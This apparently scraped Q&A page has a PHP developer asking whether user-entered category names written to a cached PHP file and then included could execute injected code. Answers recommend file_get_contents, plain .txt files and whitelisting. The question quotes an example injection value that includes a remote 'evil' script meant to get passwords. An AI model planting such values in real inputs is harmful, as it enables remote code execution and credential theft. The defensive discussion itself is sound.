Php. User can write data in a file and i include the file
Question
User writes categories ( name , url ) in mysql.
On each write/change name and url I plan to write also in txt or php file on a server. With aim on each page re/load instead of connecting to mysql, just to include the txt or php file.
Now i imagine a situation. For example, user as name of category writes something include("http://www.evil/get-passwords.php"); So in txt or php file I may have such code and when include in php the code will execute?
How to prevent such situation? To allow only certain characters to use for name of a category?
2 answers
solution1
3 2014-11-06 10:13:00
I would not recommend to use include for situations like that at all. You may have a look at http://php.net/manual/en/function.file-get-contents.php
Using file_get_contents you are able to avoid script injection, since it reads the file as a pure string.
solution2
1 2014-11-06 10:13:57
Do you plan to let users write into .php file? That is not a very good idea.
If you really need this, let them write in simple .txt files (and double check that apache will not parse txt as php ).
For sanitization, the common apporach is to write an allowed list (white-list):
$allowedName = array(
'name1',
'name2',
'name3'
// ...
);
Then when user input you can check it:
if (!in_array($_POST['userName'], $allowedName))
die('Not Allowed');
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.